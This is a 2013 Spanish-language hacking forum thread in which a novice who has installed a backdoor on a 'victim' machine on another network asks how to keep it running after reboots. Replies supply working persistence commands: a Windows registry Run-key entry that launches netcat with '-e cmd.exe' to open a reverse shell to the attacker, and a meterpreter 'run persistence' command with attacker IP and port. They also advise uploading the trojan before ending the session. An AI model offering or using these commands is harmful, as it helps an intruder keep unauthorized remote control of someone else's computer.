Underc0de - La Casa de los Informáticos

Foros Generales => Dudas y pedidos generales => Mensaje iniciado por: pelumon en Octubre 01, 2013, 07:56:18 PM

Título: [SOLUCIONADO] Backdoor autorun ayuda!!!
Publicado por: pelumon en Octubre 01, 2013, 07:56:18 PM
que tal banda bueno pues les cuanto que pude crear un backdoor e instalarlo en otra maquina con red diferente y todo marcha bien, lo que quiero saber es como lo instalo para que inicie en procesos cada que se prenda y apague la computadora ya intente con run presistence pero lo que no se es si se pone la ip de la maquina victima la externa o la local ya que en armitage me salen las 2, de echo eh intentado con las 2 pero no eh tenid exito gracias bandda salu2.....
Título: Re:backdoor autorun ayuda!!!
Publicado por: q3rv0 en Octubre 01, 2013, 10:22:02 PM
Lo que podes hacer si ya tenes acceso a la maquina remota es decargar netcat y agregar la siguiente entrada al registro de windows para que el binario se ejecute cada vez que la maquina se inicie

Código (dos) [Seleccionar]
reg add HKLM\SOFTWARE\microsoft\windows\currentversion\run /v backdoor /d "/ruta/nc.exe -vv tuip puerto -e cmd.exe"

Reemplaza /ruta/nc.exe por el destino original donde se va a encontrar el netcat, asi mismo con "tuip" y "puerto" por los valores correspondientes, Luego te pones a escuchar para obtener la shell inversa.



Título: Re:backdoor autorun ayuda!!!
Publicado por: pelumon en Octubre 04, 2013, 01:38:39 AM
me comunico con la maquina con netcat y esto me abrira la sell?? pero despues, hehehe perdon aun soy novato
Título: Re:backdoor autorun ayuda!!!
Publicado por: TrollMine en Octubre 04, 2013, 10:57:40 AM
Antes de cerrar la sesión de meterpreter tenias que subir el troyano, exe, payload o como le quieras llamar, para que cuando entres a la shell, lo ejecutes, y se te abra la sesión.

Título: Re:backdoor autorun ayuda!!!
Publicado por: Darkan en Octubre 04, 2013, 05:45:50 PM
yo creo que tienes que poner la ip atacante no la víctima

escribe run persistence -h para ver las opciones
escribiré run persistence -U -i 5 -p PUERTO -r IP

meterpreter > run persistence -U -i 5 -p 4444 -r 192.168.254.128
Título: Re:backdoor autorun ayuda!!!
Publicado por: pelumon en Octubre 09, 2013, 06:03:02 PM
Si la pc victima esta encendida primero que la atante aun Asi se puede conectar o nesesita primero estar exploit ?
Título: Re:backdoor autorun ayuda!!!
Publicado por: pelumon en Octubre 09, 2013, 06:03:57 PM
Gracias por contestar salu2  8)